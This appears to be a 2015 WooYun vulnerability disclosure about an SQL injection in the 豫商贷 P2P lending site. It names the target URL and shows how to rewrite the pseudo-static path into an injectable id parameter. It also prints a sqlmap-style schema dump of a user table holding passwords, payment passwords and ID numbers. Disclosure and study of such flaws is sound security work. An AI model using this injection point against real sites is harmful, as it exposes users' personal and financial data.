漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0114051
漏洞标题:豫商贷P2P金融平台SQL注入一枚可导致用户信息泄漏(伪静态重构突破)
相关厂商:豫商贷
漏洞作者: anting
提交时间:2015-05-14 16:19
修复时间:2015-06-28 16:20
公开时间:2015-06-28 16:20
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-05-14: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-06-28: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
一次浅尝辄止的测试
详细说明:
这是一个伪静态https://www.zzwms.com/news/info/id/5134.html
然后重新构造以下https://www.zzwms.com/news/info?id=5134或者直接加个*也行
内容相当多,用户名密码,wangwang,支付密码,由于只是测试,只是简单的看了下部分用户名(总用户10132)
漏洞证明:
Database: zzwms
Table: dw_user
[51 columns]
+-----------------+------------------+
| Column | Type |
+-----------------+------------------+
| order | int(11) |
| AccountNumber | varchar(10) |
| addip | varchar(50) |
| address | varchar(200) |
| addtime | varchar(50) |
| answer | varchar(100) |
| area | varchar(20) |
| Authorize | varchar(10) |
| avatar_status | int(2) |
| birthday | varchar(11) |
| card_id | varchar(50) |
| card_pic1 | varchar(150) |
| card_pic2 | varchar(150) |
| card_type | varchar(10) |
| city | varchar(20) |
| email | varchar(30) |
| email_status | varchar(50) |
| integral | varchar(10) |
| invite_money | varchar(10) |
| invite_userid | varchar(11) |
| islock | int(2) |
| lastip | varchar(20) |
| lasttime | varchar(50) |
| litpic | varchar(250) |
| Loanaddtime | varchar(50) |
| logintime | int(11) |
| MoneymoremoreId | varchar(10) |
| nation | varchar(10) |
| password | varchar(50) |
| paypassword | varchar(50) |
| phone | varchar(50) |
| phone_status | varchar(50) |
| privacy | text |
| province | varchar(20) |
| purview | varchar(100) |
| qq | varchar(50) |
| question | varchar(10) |
| real_status | varchar(2) |
| realname | varchar(20) |
| remind | text |
| scene_status | int(2) |
| sex | varchar(10) |
| status | int(2) |
| tel | varchar(50) |
| type_id | int(11) |
| upip | varchar(50) |
| uptime | varchar(50) |
| user_id | int(10) unsigned |
| username | varchar(30) |
| video_status | int(2) |
| wangwang | varchar(100) |
+-----------------+------------------+
修复方案:
安全很重要,欢迎来到乌云啊
版权声明:转载请注明来源 anting@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)